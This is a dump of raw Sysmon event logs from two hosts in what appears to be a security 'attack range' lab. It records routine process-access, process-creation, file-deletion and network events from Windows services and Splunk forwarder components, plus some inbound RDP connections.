11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1587-6216-D604-000000003902}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.223{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1587-6216-D604-000000003902}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.224{4F8D34B0-1587-6216-D604-000000003902}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:52.814{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CE9260AFEDED15A467485F5136E9472,SHA256=D9E91459E1B58C10B8378BEF0B0F99CC9EA137758572A8F7A3810A8E9E34F46C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:52.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D319E85F47B088AE223C3F49BFCC11,SHA256=D7ADAC6DCF6E68E46E1714798054926EB79D335868D9C00DCA330A2968D961DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:52.270{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1279C611ADBB05E71D9F19CFEF5529CE,SHA256=C06D57950D269A5E8AAD6DD9277C46C808EF534885255BEC7B6E6BAC11C740C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:53.815{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C16E296E78CDB5EC7AFD519888A6B7D6,SHA256=B5FAACE95E689CC8752838821B6DEB5AEB41D67D8E4A9B6B98A5F225CCF2D302,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:51.207{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx51757-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:53.614{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B46F942969CE2D68F895E2315F2D936,SHA256=03D693A9B72AB0726DE87C56BEED3BE7E2CBA8DF2C744A04E60F33EFD323550A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:51.535{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49266-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:54.830{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F6470C8202FF57C5D88552003C1C86,SHA256=FBD2B6E5447CD26C60C434ECFB298DF3364B20992D5F17580619FE6AEEEBCF63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:54.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203BE5EEB4B85D99E9A22A027281D7C6,SHA256=A9AF980A5D961358ADAB88E6B3819FBF24009F800AB11CE387E9E0F7E1EDB866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:54.411{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F171D75AB50BE8EA1FB97836B1260A3D,SHA256=4B8A721A9B4762146067080C4AF34E0A0CE5855273D80F2983497390F9DB88BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:55.845{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10CBAC263F055CC57175717134DE6DA7,SHA256=DC5AD7D728F9B9F65DC66CC362325315BDBF8C5C2AB1D01B5A5F36F147CB1A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:55.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03D48F5879C45E966C773078C45405E8,SHA256=7AEDBE83465DB5D310BF773B2A28ACF887ADF0C36E691A12DAAE421E3B3EA4E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:54.688{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51543-false10.0.1.12-8000- 23542300x8000000000000000219872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:56.661{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D309A50098DC349239C2C2AC9022B7C0,SHA256=915D0FF7A356362F1C6F469E2E8B8093DC4FB48986223458C20D62B992AE9C33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:56.864{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1E643602C04EA17AA6CFC2C16E8883A,SHA256=29B2EB1FF42339DBC317BB46C4213D48D65C5C0B3EC6DE301F6C5C7E057F7393,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:57.912{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EFC47515CF2B749D13DE559BA429DCA,SHA256=D4387988128B658D40A514497AADE1D89B0C3ECA301C0AB750F9AEC5B3BEE5A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:55.005{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx49948-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:57.676{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1DA1CE7F940D4EE3104F47A16D19B14,SHA256=A1B568ECC45C8F9C9E6BDAF7381E26187CC41EEE01FAF81285BAE4C1A4E5BA6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:58.928{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=605A5400DE4FEB0A94A3C3561A46FFEA,SHA256=B628D3ED7A1A1EC5A90E5C1FEF0EC9FA9239F40ACC1645E3898AE7D0F132AF24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:58.707{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90B6FD08E0904C2C56099C484B289B22,SHA256=B8853774720DA2088CA60E334EF6B03456C09E4B1DC2D3A017DA098FDCAC8293,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:56.587{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49267-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:58.348{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CF22436D944B6F11BCCF21B0349A8AE,SHA256=5E5739F48A6FE0E32E696378F952244B6454816C93FF7704C8FAF053EF13564F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:59.942{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9F7CEC6A774C5A4830797926BDBA591,SHA256=D5BFB97273BD4B4DA6A7DE38138203BC3E4B966915327B4B0EF4AF5DCC9FE6E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:59.963{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCF1C808FBA994D0815A29636E9E8F2B,SHA256=515CF56E1E50CB28274D36C4264D0E7DF2A0E314CB8626FCB6BE516028A91DE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:00.980{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9C235FAFF87AAE73A10EEBA343950E8,SHA256=CA1DEE68DD9D22CA8ACB513D4E48137CF26BE1B19196C836401660F9DE54EBAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:01.145{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=483B436644BF3C751A177BEF5AF30344,SHA256=05A4765C2D38AC29EF94ECA6F6DFE170FC68BE39ECE90F373AAF0C2946D52901,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AC2C56498F2FC0D254C600474C2197B3,SHA256=884418618B565DBA9156BA4FF8C3E0B1715154E4FBFC95D635524DC0FAE6C42E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6A1D886EFADE8003ED25F944E5FD69D0,SHA256=A868AE30FF6C78887EC136FF416784D4223DC6C32D13BFE85B703AD8D3E3618D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.526{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1591-6216-D006-000000003802}6388C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.526{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.526{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.526{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.526{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.526{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1591-6216-D006-000000003802}6388C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:01.526{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1591-6216-D006-000000003802}6388C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 